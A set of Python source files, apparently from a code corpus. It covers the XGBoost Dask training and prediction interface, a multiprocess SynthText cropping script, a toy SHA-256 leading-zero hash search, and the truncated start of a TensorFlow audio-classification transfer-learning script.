'''Simple wrapper around testing None.'''
ret = get_client() if client is None else client
return ret
def _get_client_workers(client):
workers = client.scheduler_info()['workers']
return workers
def _assert_client(client):
if not isinstance(client, (type(get_client()), type(None))):
raise TypeError(
_expect([type(get_client()), type(None)], type(client)))
class DaskDMatrix:
# pylint: disable=missing-docstring, too-many-instance-attributes
'''DMatrix holding on references to Dask DataFrame or Dask Array. Constructing
a `DaskDMatrix` forces all lazy computation to be carried out. Wait for
the input data explicitly if you want to see actual computation of
constructing `DaskDMatrix`.
Parameters
----------
client: dask.distributed.Client
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
data : dask.array.Array/dask.dataframe.DataFrame
data source of DMatrix.
label: dask.array.Array/dask.dataframe.DataFrame
label used for trainin.
missing : float, optional
Value in the input data (e.g. `numpy.ndarray`) which needs
to be present as a missing value. If None, defaults to np.nan.
weight : dask.array.Array/dask.dataframe.DataFrame
Weight for each instance.
feature_names : list, optional
Set names for features.
feature_types : list, optional
Set types for features
'''
_feature_names = None # for previous version's pickle
_feature_types = None
def __init__(self,
client,
data,
label=None,
missing=None,
weight=None,
feature_names=None,
feature_types=None):
_assert_dask_support()
_assert_client(client)
self._feature_names = feature_names
self._feature_types = feature_types
self._missing = missing
if len(data.shape) != 2:
raise ValueError(
'Expecting 2 dimensional input, got: {shape}'.format(
shape=data.shape))
if not isinstance(data, (dd.DataFrame, da.Array)):
raise TypeError(_expect((dd.DataFrame, da.Array), type(data)))
if not isinstance(label, (dd.DataFrame, da.Array, dd.Series,
type(None))):
raise TypeError(
_expect((dd.DataFrame, da.Array, dd.Series), type(label)))
self.worker_map = None
self.has_label = label is not None
self.has_weights = weight is not None
client = _xgb_get_client(client)
client.sync(self.map_local_data, client, data, label, weight)
async def map_local_data(self, client, data, label=None, weights=None):
'''Obtain references to local data.'''
def inconsistent(left, left_name, right, right_name):
msg = 'Partitions between {a_name} and {b_name} are not ' \
'consistent: {a_len} != {b_len}. ' \
'Please try to repartition/rechunk your data.'.format(
a_name=left_name, b_name=right_name, a_len=len(left),
b_len=len(right)
)
return msg
def check_columns(parts):
# x is required to be 2 dim in __init__
assert parts.ndim == 1 or parts.shape[1], 'Data should be' \
' partitioned by row. To avoid this specify the number' \
' of columns for your dask Array explicitly. e.g.' \
' chunks=(partition_size, X.shape[1])'
data = data.persist()
if label is not None:
label = label.persist()
if weights is not None:
weights = weights.persist()
# Breaking data into partitions, a trick borrowed from dask_xgboost.
# `to_delayed` downgrades high-level objects into numpy or pandas
# equivalents.
X_parts = data.to_delayed()
if isinstance(X_parts, numpy.ndarray):
check_columns(X_parts)
X_parts = X_parts.flatten().tolist()
if label is not None:
y_parts = label.to_delayed()
if isinstance(y_parts, numpy.ndarray):
check_columns(y_parts)
y_parts = y_parts.flatten().tolist()
if weights is not None:
w_parts = weights.to_delayed()
if isinstance(w_parts, numpy.ndarray):
check_columns(w_parts)
w_parts = w_parts.flatten().tolist()
parts = [X_parts]
if label is not None:
assert len(X_parts) == len(
y_parts), inconsistent(X_parts, 'X', y_parts, 'labels')
parts.append(y_parts)
if weights is not None:
assert len(X_parts) == len(
w_parts), inconsistent(X_parts, 'X', w_parts, 'weights')
parts.append(w_parts)
parts = list(map(delayed, zip(*parts)))
parts = client.compute(parts)
await distributed_wait(parts) # async wait for parts to be computed
for part in parts:
assert part.status == 'finished'
key_to_partition = {part.key: part for part in parts}
who_has = await client.scheduler.who_has(
keys=[part.key for part in parts])
worker_map = defaultdict(list)
for key, workers in who_has.items():
worker_map[next(iter(workers))].append(key_to_partition[key])
self.worker_map = worker_map
def get_worker_parts(self, worker):
'''Get mapped parts of data in each worker.'''
list_of_parts = self.worker_map[worker.address]
assert list_of_parts, 'data in ' + worker.address + ' was moved.'
assert isinstance(list_of_parts, list)
# `get_worker_parts` is launched inside worker. In dask side
# this should be equal to `worker._get_client`.
client = get_client()
list_of_parts = client.gather(list_of_parts)
if self.has_label:
if self.has_weights:
data, labels, weights = zip(*list_of_parts)
else:
data, labels = zip(*list_of_parts)
weights = None
else:
data = [d[0] for d in list_of_parts]
labels = None
weights = None
return data, labels, weights
def get_worker_data(self, worker):
'''Get data that local to worker.
Parameters
----------
worker: The worker used as key to data.
Returns
-------
A DMatrix object.
'''
if worker.address not in set(self.worker_map.keys()):
msg = 'worker {address} has an empty DMatrix. ' \
'All workers associated with this DMatrix: {workers}'.format(
address=worker.address,
workers=set(self.worker_map.keys()))
logging.warning(msg)
d = DMatrix(numpy.empty((0, 0)),
feature_names=self._feature_names,
feature_types=self._feature_types)
return d
data, labels, weights = self.get_worker_parts(worker)
data = concat(data)
if self.has_label:
labels = concat(labels)
else:
labels = None
if self.has_weights:
weights = concat(weights)
else:
weights = None
dmatrix = DMatrix(data,
labels,
weight=weights,
missing=self._missing,
feature_names=self._feature_names,
feature_types=self._feature_types)
return dmatrix
def get_worker_data_shape(self, worker):
'''Get the shape of data X in each worker.'''
data, _, _ = self.get_worker_parts(worker)
shapes = [d.shape for d in data]
rows = 0
cols = 0
for shape in shapes:
rows += shape[0]
c = shape[1]
assert cols in (0, c), 'Shape between partitions are not the' \
' same. Got: {left} and {right}'.format(left=c, right=cols)
cols = c
return (rows, cols)
def _get_rabit_args(worker_map, client):
'''Get rabit context arguments from data distribution in DaskDMatrix.'''
host = distributed_comm.get_address_host(client.scheduler.address)
env = client.run_on_scheduler(_start_tracker, host.strip('/:'),
len(worker_map))
rabit_args = [('%s=%s' % item).encode() for item in env.items()]
return rabit_args
# train and predict methods are supposed to be "functional", which meets the
# dask paradigm. But as a side effect, the `evals_result` in single-node API
# is no longer supported since it mutates the input parameter, and it's not
# intuitive to sync the mutation result. Therefore, a dictionary containing
# evaluation history is instead returned.
def train(client, params, dtrain, *args, evals=(), **kwargs):
'''Train XGBoost model.
Parameters
----------
client: dask.distributed.Client
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
\\*\\*kwargs:
Other parameters are the same as `xgboost.train` except for `evals_result`,
which is returned as part of function return value instead of argument.
Returns
-------
results: dict
A dictionary containing trained booster and evaluation history.
`history` field is the same as `eval_result` from `xgboost.train`.
.. code-block:: python
{'booster': xgboost.Booster,
'history': {'train': {'logloss': ['0.48253', '0.35953']},
'eval': {'logloss': ['0.480385', '0.357756']}}}
'''
_assert_dask_support()
_assert_client(client)
if 'evals_result' in kwargs.keys():
raise ValueError(
'evals_result is not supported in dask interface.',
'The evaluation history is returned as result of training.')
client = _xgb_get_client(client)
workers = list(_get_client_workers(client).keys())
rabit_args = _get_rabit_args(workers, client)
def dispatched_train(worker_addr):
'''Perform training on a single worker.'''
logging.info('Training on %s', str(worker_addr))
worker = distributed_get_worker()
with RabitContext(rabit_args):
local_dtrain = dtrain.get_worker_data(worker)
local_evals = []
if evals:
for mat, name in evals:
if mat is dtrain:
local_evals.append((local_dtrain, name))
continue
local_mat = mat.get_worker_data(worker)
local_evals.append((local_mat, name))
local_history = {}
local_param = params.copy() # just to be consistent
bst = worker_train(params=local_param,
dtrain=local_dtrain,
*args,
evals_result=local_history,
evals=local_evals,
**kwargs)
ret = {'booster': bst, 'history': local_history}
if local_dtrain.num_row() == 0:
ret = None
return ret
futures = client.map(dispatched_train,
workers,
pure=False,
workers=workers)
results = client.gather(futures)
return list(filter(lambda ret: ret is not None, results))[0]
def predict(client, model, data, *args):
'''Run prediction with a trained booster.
.. note::
Only default prediction mode is supported right now.
Parameters
----------
client: dask.distributed.Client
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
model: A Booster or a dictionary returned by `xgboost.dask.train`.
The trained model.
data: DaskDMatrix
Input data used for prediction.
Returns
-------
prediction: dask.array.Array
'''
_assert_dask_support()
_assert_client(client)
if isinstance(model, Booster):
booster = model
elif isinstance(model, dict):
booster = model['booster']
else:
raise TypeError(_expect([Booster, dict], type(model)))
if not isinstance(data, DaskDMatrix):
raise TypeError(_expect([DaskDMatrix], type(data)))
worker_map = data.worker_map
client = _xgb_get_client(client)
rabit_args = _get_rabit_args(worker_map, client)
def dispatched_predict(worker_id):
'''Perform prediction on each worker.'''
logging.info('Predicting on %d', worker_id)
worker = distributed_get_worker()
local_x = data.get_worker_data(worker)
with RabitContext(rabit_args):
local_predictions = booster.predict(
data=local_x, validate_features=local_x.num_row() != 0, *args)
return local_predictions
futures = client.map(dispatched_predict,
range(len(worker_map)),
pure=False,
workers=list(worker_map.keys()))
def dispatched_get_shape(worker_id):
'''Get shape of data in each worker.'''
logging.info('Trying to get data shape on %d', worker_id)
worker = distributed_get_worker()
rows, _ = data.get_worker_data_shape(worker)
return rows, 1 # default is 1
# Constructing a dask array from list of numpy arrays
# See https://docs.dask.org/en/latest/array-creation.html
futures_shape = client.map(dispatched_get_shape,
range(len(worker_map)),
pure=False,
workers=list(worker_map.keys()))
shapes = client.gather(futures_shape)
arrays = []
for i in range(len(futures_shape)):
arrays.append(da.from_delayed(futures[i], shape=(shapes[i][0], ),
dtype=numpy.float32))
predictions = da.concatenate(arrays, axis=0)
return predictions
def _evaluation_matrices(client, validation_set, sample_weights):
'''
Parameters
----------
validation_set: list of tuples
Each tuple contains a validation dataset including input X and label y.
E.g.:
.. code-block:: python
[(X_0, y_0), (X_1, y_1), ... ]
sample_weights: list of arrays
The weight vector for validation data.
Returns
-------
evals: list of validation DMatrix
'''
evals = []
if validation_set is not None:
assert isinstance(validation_set, list)
for i, e in enumerate(validation_set):
w = (sample_weights[i]
if sample_weights is not None else None)
dmat = DaskDMatrix(client=client, data=e[0], label=e[1], weight=w)
evals.append((dmat, 'validation_{}'.format(i)))
else:
evals = None
return evals
class DaskScikitLearnBase(XGBModel):
'''Base class for implementing scikit-learn interface with Dask'''
_client = None
# pylint: disable=arguments-differ
def fit(self,
X,
y,
sample_weights=None,
eval_set=None,
sample_weight_eval_set=None):
'''Fit the regressor.
Parameters
----------
X : array_like
Feature matrix
y : array_like
Labels
sample_weight : array_like
instance weights
eval_set : list, optional
A list of (X, y) tuple pairs to use as validation sets, for which
metrics will be computed.
Validation metrics will help us track the performance of the model.
sample_weight_eval_set : list, optional
A list of the form [L_1, L_2, ..., L_n], where each L_i is a list
of group weights on the i-th validation set.'''
raise NotImplementedError
def predict(self, data): # pylint: disable=arguments-differ
'''Predict with `data`.
Parameters
----------
data: data that can be used to construct a DaskDMatrix
Returns
-------
prediction : dask.array.Array'''
raise NotImplementedError
@property
def client(self):
'''The dask client used in this model.'''
client = _xgb_get_client(self._client)
return client
@client.setter
def client(self, clt):
self._client = clt
@xgboost_model_doc("""Implementation of the Scikit-Learn API for XGBoost.""",
['estimators', 'model'])
class DaskXGBRegressor(DaskScikitLearnBase):
# pylint: disable=missing-docstring
def fit(self,
X,
y,
sample_weights=None,
eval_set=None,
sample_weight_eval_set=None):
_assert_dask_support()
dtrain = DaskDMatrix(client=self.client,
data=X, label=y, weight=sample_weights)
params = self.get_xgb_params()
evals = _evaluation_matrices(self.client,
eval_set, sample_weight_eval_set)
results = train(self.client, params, dtrain,
num_boost_round=self.get_num_boosting_rounds(),
evals=evals)
# pylint: disable=attribute-defined-outside-init
self._Booster = results['booster']
# pylint: disable=attribute-defined-outside-init
self.evals_result_ = results['history']
return self
def predict(self, data): # pylint: disable=arguments-differ
_assert_dask_support()
test_dmatrix = DaskDMatrix(client=self.client, data=data)
pred_probs = predict(client=self.client,
model=self.get_booster(), data=test_dmatrix)
return pred_probs
@xgboost_model_doc(
'Implementation of the scikit-learn API for XGBoost classification.',
['estimators', 'model']
)
class DaskXGBClassifier(DaskScikitLearnBase, XGBClassifierBase):
# pylint: disable=missing-docstring
_client = None
def fit(self,
X,
y,
sample_weights=None,
eval_set=None,
sample_weight_eval_set=None):
_assert_dask_support()
dtrain = DaskDMatrix(client=self.client,
data=X, label=y, weight=sample_weights)
params = self.get_xgb_params()
# pylint: disable=attribute-defined-outside-init
if isinstance(y, (da.Array)):
self.classes_ = da.unique(y).compute()
else:
self.classes_ = y.drop_duplicates().compute()
self.n_classes_ = len(self.classes_)
if self.n_classes_ > 2:
params["objective"] = "multi:softprob"
params['num_class'] = self.n_classes_
else:
params["objective"] = "binary:logistic"
evals = _evaluation_matrices(self.client,
eval_set, sample_weight_eval_set)
results = train(self.client, params, dtrain,
num_boost_round=self.get_num_boosting_rounds(),
evals=evals)
self._Booster = results['booster']
# pylint: disable=attribute-defined-outside-init
self.evals_result_ = results['history']
return self
def predict(self, data): # pylint: disable=arguments-differ
_assert_dask_support()
test_dmatrix = DaskDMatrix(client=self.client, data=data)
pred_probs = predict(client=self.client,
model=self.get_booster(), data=test_dmatrix)
return pred_probs
|
crop_synthtext.py | #encoding=utf8
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Multi-process crop synthtext and save it to lmdb or images/text file
from typing import *
import sys
import os
from itertools import chain
import math
import re
import logging
from multiprocessing import Queue, Pool, Process, Manager
from pathlib import Path
import argparse
import cv2
import numpy as np
from loguru import logger
import scipy.io as sio
import lmdb
logger.remove(0)
logger.add('errors.log', level=logging.DEBUG)
logger.add(sys.stdout, level=logging.INFO)
QUEUE_SIZE = 50000
WORKERS = 8
LMDB_WRITE_BATCH = 5000
def crop_box_worker(args):
'''
crop synthtext by word bounding box, and put cropped data into queue
'''
image_name, txt, boxes, queue = args
cropped_indx = 0
# Get image name
# print('IMAGE : {}'.format(image_name))
# get transcript
txt = [re.split(' \n|\n |\n| ', t.strip()) for t in txt]
txt = list(chain(*txt))
txt = [t for t in txt if len(t) > 0]
# Open image
# img = Image.open(image_name)
img = cv2.imread(image_name, cv2.IMREAD_COLOR)
img_height, img_width, _ = img.shape
# Validation
if len(np.shape(boxes)) == 2:
wordBBlen = 1
else:
wordBBlen = boxes.shape[-1]
if wordBBlen == len(txt):
# Crop image and save
for word_indx in range(len(txt)):
if len(np.shape(boxes)) == 2: # only one word (2,4)
wordBB = boxes
else: # many words (2,4,num_words)
wordBB = boxes[:, :, word_indx]
if np.shape(wordBB) != (2, 4):
err_log = 'malformed box index: {}\t{}\t{}\n'.format(image_name, txt[word_indx], wordBB)
logger.debug(err_log)
continue
pts1 = np.float32([[wordBB[0][0], wordBB[1][0]],
[wordBB[0][3], wordBB[1][3]],
[wordBB[0][1], wordBB[1][1]],
[wordBB[0][2], wordBB[1][2]]])
height = math.sqrt((wordBB[0][0] - wordBB[0][3]) ** 2 + (wordBB[1][0] - wordBB[1][3]) ** 2)
width = math.sqrt((wordBB[0][0] - wordBB[0][1]) ** 2 + (wordBB[1][0] - wordBB[1][1]) ** 2)
# Coord validation check
if (height * width) <= 0:
err_log = 'empty file : {}\t{}\t{}\n'.format(image_name, txt[word_indx], wordBB)
logger.debug(err_log)
continue
elif (height * width) > (img_height * img_width):
err_log = 'too big box : {}\t{}\t{}\n'.format(image_name, txt[word_indx], wordBB)
logger.debug(err_log)
continue
else:
valid = True
for i in range(2):
for j in range(4):
if wordBB[i][j] < 0 or wordBB[i][j] > img.shape[1 - i]:
valid = False
break
if not valid:
break
if not valid:
err_log = 'invalid coord : {}\t{}\t{}\t{}\t{}\n'.format(
image_name, txt[word_indx], wordBB, (width, height), (img_width, img_height))
logger.debug(err_log)
continue
pts2 = np.float32([[0, 0],
[0, height],
[width, 0],
[width, height]])
M = cv2.getPerspectiveTransform(pts1, pts2)
img_cropped = cv2.warpPerspective(img, M, (int(width), int(height)))
cropped_dir_name = image_name.split('/')[-2]
cropped_file_name = "{}_{}_{}.jpg".format(cropped_indx,
image_name.split('/')[-1][:-len('.jpg')], word_indx)
cropped_indx += 1
data = dict(cropped_dir_name=cropped_dir_name,
filename=cropped_file_name,
transcript=txt[word_indx],
image=img_cropped)
queue.put(data)
else:
err_log = 'word_box_mismatch : {}\t{}\t{}\n'.format(image_name,
txt,
boxes)
logger.write(err_log)
def writeCache(env, cache: dict):
with env.begin(write=True) as txn:
for k, v in cache.items():
txn.put(k.encode(), v)
def lmdb_writer(lmdb_path: str, queue: Queue):
env = lmdb.open(lmdb_path, map_size=1099511627776)
buffer = {}
counter = 0
while True:
data = queue.get()
if data != 'Done':
counter += 1
img_cropped = data['image']
img_cropped = cv2.imencode('.jpg', img_cropped)[1]
buffer['image-{}'.format(counter)] = img_cropped.tobytes()
buffer['transcript-{}'.format(counter)] = data['transcript'].encode()
if counter % LMDB_WRITE_BATCH == 0 and counter != 0:
writeCache(env, buffer)
logger.info('{} done.'.format(counter))
buffer = {}
else:
buffer['nSamples'] = str(counter).encode()
writeCache(env, buffer)
logger.info('Finished. Total {}'.format(counter))
break
def images_with_gt_file_writer(images_path: str, gt_file: str, queue: Queue):
gtfile = os.path.join(images_path, gt_file)
counter = 0
while True:
data = queue.get()
if data != 'Done':
cropped_dir_name = data['cropped_dir_name']
filename = data['filename']
transcript = data['transcript']
img_cropped = data['image']
cropped_dir = os.path.join(images_path, cropped_dir_name)
if not os.path.exists(cropped_dir):
os.mkdir(cropped_dir)
cropped_file_name = os.path.join(cropped_dir, filename)
cv2.imwrite(cropped_file_name, img_cropped)
with open(gtfile, 'a+', encoding='utf-8', ) as gt_f:
gt_f.write('%s,%s\n' % (os.path.join(cropped_dir_name, filename), transcript))
counter += 1
if counter % LMDB_WRITE_BATCH == 0 and counter != 0:
logger.info('{} done.'.format(counter))
else:
logger.info('Finished. Total {}'.format(counter))
break
def lmdb_and_images_with_gt_file_writer(lmdb_path: str, images_path: str, gt_file: str, queue: Queue):
env = lmdb.open(lmdb_path, map_size=1099511627776)
gtfile = os.path.join(images_path, gt_file)
buffer = {}
counter = 0
while True:
data = queue.get()
if data != 'Done':
counter += 1
img_cropped = data['image']
transcript = data['transcript']
img_cropped_buf = cv2.imencode('.jpg', img_cropped)[1]
buffer['image-{}'.format(counter)] = img_cropped_buf.tobytes()
buffer['transcript-{}'.format(counter)] = transcript.encode()
# write to images and gt file
cropped_dir_name = data['cropped_dir_name']
filename = data['filename']
cropped_dir = os.path.join(images_path, cropped_dir_name)
if not os.path.exists(cropped_dir):
os.mkdir(cropped_dir)
cropped_file_name = os.path.join(cropped_dir, filename)
cv2.imwrite(cropped_file_name, img_cropped)
with open(gtfile, 'a+', encoding='utf-8', ) as gt_f:
gt_f.write('%s,%s\n' % (os.path.join(cropped_dir_name, filename), transcript))
# write to lmdb
if counter % LMDB_WRITE_BATCH == 0 and counter != 0:
writeCache(env, buffer)
logger.info('{} done.'.format(counter))
buffer = {}
else:
buffer['nSamples'] = str(counter).encode()
writeCache(env, buffer)
logger.info('Finished. Total {}'.format(counter))
break
def synthtext_reader(synthtext_folder: str, queue: Queue, pool: Pool):
synthtext_folder = Path(synthtext_folder)
logger.info('Loading gt.mat ...')
mat_contents = sio.loadmat(synthtext_folder.joinpath('gt.mat'))
logger.info('Loading finish.')
image_names = mat_contents['imnames'][0]
# crop synthtext for every image, and put it into queue
pool.map(crop_box_worker, iter([(synthtext_folder.joinpath(item[0]).absolute().as_posix(),
mat_contents['txt'][0][index],
mat_contents['wordBB'][0][index],
queue)
for index, item in enumerate(image_names[:])]))
# for index, item in enumerate(image_names):
# crop_box_worker((synthtext_folder.joinpath('imgs/{}'.format(item[0])).absolute(),
# mat_contents['txt'][0][index],
# mat_contents['wordBB'][0][index],
# queue))
def main(args):
if not Path(args.synthtext_folder).exists():
logger.error('synthtext_folder does not exist!')
raise FileNotFoundError
manager = Manager()
queue = manager.Queue(maxsize=QUEUE_SIZE)
# config data writer parallel process, read cropped data from queue, then save it to lmdb or images/txt file
if args.data_format == 'lmdb':
writer_process = Process(target=lmdb_writer, name='lmdb writer', args=(args.lmdb_path, queue), daemon=True)
elif args.data_format == 'images_with_gt_file':
Path(args.images_folder).mkdir(parents=True, exist_ok=True)
writer_process = Process(target=images_with_gt_file_writer, name='images_with_gt_file writer',
args=(args.images_folder, args.gt_file, queue), daemon=True)
else:
Path(args.images_folder).mkdir(parents=True, exist_ok=True)
writer_process = Process(target=lmdb_and_images_with_gt_file_writer,
name='lmdb_and_images_with_gt_file_writer writer',
args=(args.lmdb_path, args.images_folder, args.gt_file, queue), daemon=True)
writer_process.start()
logger.info('{} writer is started with PID: {}'.format(args.data_format, writer_process.pid))
# config synthtext data reader jobs
pool = Pool(processes=WORKERS, maxtasksperchild=10000)
try:
logger.info('Start cropping...')
# crop synthtext, and put cropped data into queue
synthtext_reader(args.synthtext_folder, queue, pool)
queue.put('Done')
pool.close()
pool.join()
writer_process.join()
writer_process.close()
logger.info('End cropping.')
except KeyboardInterrupt:
logger.info('Terminated by Ctrl+C.')
pool.terminate()
pool.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Multi-process crop synthtext and save it to lmdb or images/text file')
parser.add_argument('--synthtext_folder', default=None, type=str, required=True,
help='synthtext root folder including gt.mat file, (default: None)')
parser.add_argument('--data_format', choices=['lmdb', 'images_with_gt_file', 'both'], default='images_with_gt_file',
type=str, required=True, help='output data format (default: images_with_gt_file)')
parser.add_argument('--lmdb_path', default=None, type=str,
help='output lmdb path, if data_format is lmdb, this arg must be set. (default: None)')
parser.add_argument('--images_folder', default=None, type=str,
help='output cropped images root folder, '
'if data_format is not lmdb, this arg must be set. (default: None)')
parser.add_argument('--gt_file', default='gt.txt', type=str,
help='output gt txt file, output at images_folder/gt_file, '
'if data_format is not lmdb, this arg must be set. (default: gt.txt)')
args = parser.parse_args()
main(args)
|
scratch.py | import hashlib
import secrets
import string
import time
from multiprocessing import Process, Queue
import os
def random_str():
# Generate a random size string from 3 - 27 characters long
rand_str = ''
for i in range(0, 1 + secrets.randbelow(25)):
rand_str += string.ascii_lowercase[secrets.randbelow(26)] # each char is a random downcase letter [a-z]
return rand_str
def createhash():
m = hashlib.sha256()
m.update(random_str().encode(('utf-8')))
return m.hexdigest()
def work(q):
test = createhash()
while test[0:4] != "0"*4 :
test = createhash()
print(test)
q.put(test)
processes = []
if __name__ == '__main__':
q = Queue()
for i in range(os.cpu_count()-3):
print('registering process %d' % i)
processes.append(Process(target=work,args = (q,)) )
start = time.time()
print("start: ",start)
for process in processes:
process.start()
while True:
if not q.empty():
test = q.get()
print(test)
for process in processes:
process.terminate()
end = time.time()
print("end: ", end)
print("delta: ", end - start) |
transfer_learning.py | # coding: utf-8
import os
import sys
sys.path.insert(1, os.path.join(sys.path[0], '../'))
import numpy as np
import h5py
import argparse
import time
import logging
from sklearn import metrics
from utils import utilities, data_generator, agument
import tensorflow as tf
slim = tf.contrib.slim
import pandas as pd
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
# from mfcc import vggish_input as mfcc
from mfcc import vggish_params
import crnn
import multiprocessing as mp
import horovod.tensorflow as hvd
try:
import cPickle
except BaseException:
import _pickle as cPickle
import pika
import tasksmq_transfer as tasksmq
import vim_params as vp
import numpy as np
# 合并不感兴趣的类别
def labels_merge(y, mask, unmask):
product = np.dot(y, unmask)
if product.any(): # 包含不感兴趣的类别,环境类别
y = np.dot(y, mask) # 只保留感兴趣的类别
y [0] = True # 并设置 speech 类别为True
return y
# less than 1.0, improve precision
# larger than 1.0. improve recall.
def pos_weight_init():
weight_dict = {}
weight_dict = {
23: 1.0, # !!! Baby_cryAND_infant_cry
75: 1.0, # Bark
470: 1.0, # !!! Breaking
322: 1.0, # Emergency_vehicle
343: 1.0, # Engine
428: 1.0, # Machine_gun
14: 1.0, # !!! Screaming
399: 1.0, # Smoke_detectorAND_smoke_alarm
288: 1.0, # Water
}
w = np.ones(vp.TOTAL_NUM_CLASS)
for key in weight_dict:
w[key] = weight_dict[key]
return w
def tf_evaluate(target, output, stats_dir, probs_dir, iteration, labels_map):
"""Evaluate a model.
Args:
model: object
output: 2d array, (samples_num, _NUM_CLASS)
target: 2d array, (samples_num, _NUM_CLASS)
stats_dir: str, directory to write out statistics.
probs_dir: str, directory to write out output (samples_num, _NUM_CLASS)
iteration: int
Returns:
None
"""
utilities.create_folder(stats_dir)
utilities.create_folder(probs_dir)
# Predict presence probabilittarget
callback_time = time.time()
# (clips_num, time_steps, freq_bins) = input.shape
# (input, target) = utilities.transform_data(input, target)
output = output.astype(np.float32) # (clips_num, _NUM_CLASS)
# Write out presence probabilities
prob_path = os.path.join(probs_dir, "prob_{}_iters.p".format(iteration))
cPickle.dump(output, open(prob_path, 'wb'))
# Calculate statistics
stats = utilities.calculate_stats(output, target, labels_map)
# Write out statistics
stat_path = os.path.join(stats_dir, "stat_{}_iters.p".format(iteration))
cPickle.dump(stats, open(stat_path, 'wb'))
mAP = np.mean([stat['AP'] for stat in stats])
mAUC = np.mean([stat['auc'] for stat in stats])
logging.info(
"mAP: {:.6f}, AUC: {:.6f}, Callback time: {:.3f} s".format(
mAP, mAUC, time.time() - callback_time))
if False:
logging.info("Saveing prob to {}".format(prob_path))
logging.info("Saveing stat to {}".format(stat_path))
return mAP, mAUC, [stat['AP'] for stat in stats]
def train(args):
data_dir = args.data_dir
workspace = args.workspace
mini_data = args.mini_data
quantize = args.quantize
balance_type = args.balance_type
init_learning_rate = args.learning_rate # transfer learning rate
filename = args.filename
model_type = args.model_type
# model = args.model
batch_size = args.batch_size
hvd.init()
# # Load test data.
df = pd.read_csv(vp.FILE_CLASS_LABELS)
labels_dict = {}
labels_dict['name'] = np.array(df[df['transfer'] == 1]['display_name'])
labels_dict['id'] = np.array(df[df['transfer'] == 1]['index'])
labels_dict['count'] = []
labels_map_mask = [False] * vp.TOTAL_NUM_CLASS
for x in labels_dict['id']:
labels_map_mask[x] = True
# 感兴趣的类别设置为False
labels_map_uumask = [ not item for item in labels_map_mask] # [True True True .... False (interesting sound) ... True True]
if (hvd.rank() == 0):
# Load data
load_time = time.time()
# train_x = []
# train_y = []
# train_id_list = []
test_x = []
test_y = []
test_id_list = []
for aclass in labels_dict['name']:
print(aclass)
# local_train_x = []
# local_train_y = []
# local_train_id_list = []
local_test_x = []
local_test_y = []
local_test_id_list = []
# # Path of hdf5 data
# bal_train_hdf5_path = os.path.join(data_dir, aclass, "balanced_train_segments.hdf5")
# unbal_train_hdf5_path = os.path.join(data_dir, aclass, "unbalanced_train_segments.hdf5")
test_hdf5_path = os.path.join(data_dir, aclass, "eval_segments.hdf5")
# if mini_data:
# # Only load balanced data
# (bal_train_x, bal_train_y, bal_train_id_list) = utilities.load_data(
# bal_train_hdf5_path)
# local_train_x = bal_train_x
# local_train_y = bal_train_y
# local_train_id_list = bal_train_id_list
# else:
# # Load both balanced and unbalanced data
# (bal_train_x, bal_train_y, bal_train_id_list) = utilities.load_data(
# bal_train_hdf5_path)
# (unbal_train_x, unbal_train_y, unbal_train_id_list) = utilities.load_data(
# unbal_train_hdf5_path)
# local_train_x = np.concatenate((bal_train_x, unbal_train_x))
# local_train_y = np.concatenate((bal_train_y, unbal_train_y))
# local_train_id_list = bal_train_id_list + unbal_train_id_list
# labels_dict['count'].append(len(local_train_id_list))
# Test data
(local_test_x, local_test_y, local_test_id_list) = utilities.load_data(test_hdf5_path)
# train_x = ( local_train_x if (train_x == []) else np.concatenate((train_x, local_train_x)) )
# train_y = ( local_train_y if (train_y == []) else np.concatenate((train_y, local_train_y)) )
# train_id_list = train_id_list + local_train_id_list
test_x = ( local_test_x if (test_x == []) else np.concatenate((test_x, local_test_x)) )
test_y = ( local_test_y if (test_y == []) else np.concatenate((test_y, local_test_y)) )
test_id_list = test_id_list + local_test_id_list
# # Mask other classes.
# for ii, item in enumerate(train_y):
# train_y[ii] = np.logical_and(item, labels_map_mask)
for ii, item in enumerate(test_y):
test_y[ii] = np.logical_and(item, labels_map_mask)
for ii, item in enumerate(test_y):
if not any(item):
print(test_id_list[ii])
print(ii, item)
raise Exception('False item, no positive label.')
test_x_mfcc, test_y_mfcc, test_seq_len = tasksmq.batch_wav_to_mfcc_parallel(test_x, test_y, agumentation=False) # test_seq_len = np.ones(len(test_x_mfcc)) * 240 # length array of the batch
logging.info("Loading data time: {:.3f} s".format(time.time() - load_time))
# Output directories
sub_dir = os.path.join(filename,
'balance_type={}'.format(balance_type),
'model_type={}'.format(model_type))
models_dir = os.path.join(workspace, "models", sub_dir)
utilities.create_folder(models_dir)
stats_dir = os.path.join(workspace, "stats", sub_dir)
utilities.create_folder(stats_dir)
probs_dir = os.path.join(workspace, "probs", sub_dir)
utilities.create_folder(probs_dir)
# weighted class
pos_weight = pos_weight_init()
# Data generator
# if balance_type == 'no_balance':
# DataGenerator = data_generator.VanillaDataGenerator
# elif balance_type == 'balance_in_batch':
# DataGenerator = data_generator.BalancedDataGenerator
# else:
# raise Exception("Incorrect balance_type!")
# train_gen = DataGenerator(
# x=train_x,
# y=train_y,
# batch_size=batch_size,
# labels_map=labels_dict['id'],
# shuffle=True,
# seed=1234)
# create work thread for DataGenerator
# if IS_DISTRIBUTE and hvd.rank() == 0:
# # q_batch = mp.Queue (maxsize=10)
# task_generate_batch = mp.Process (target = tasksmq.generate_batch, args = (train_gen,))
# task_generate_batch.start()
# use tf.get_default_graph()
logits_tensor = crnn.build_crnn_model(is_training=tf.contrib.learn.ModeKeys.TRAIN) # training=False,模型参数不可被修改
with tf.variable_scope('mix'):
output_tensor = tf.sigmoid(logits_tensor, name='prediction')
# Add training ops.
with tf.variable_scope('train'):
global_step = tf.train.get_or_create_global_step() # global_step = tf.Variable(0, name='global_step', trainable=False, dtype=tf.int32)
labels = tf.placeholder(
tf.float32, shape=(None, vp.TOTAL_NUM_CLASS), name='labels')
# xent = tf.nn.sigmoid_cross_entropy_with_logits(
# logits=logits_tensor, labels=labels, name='xent')
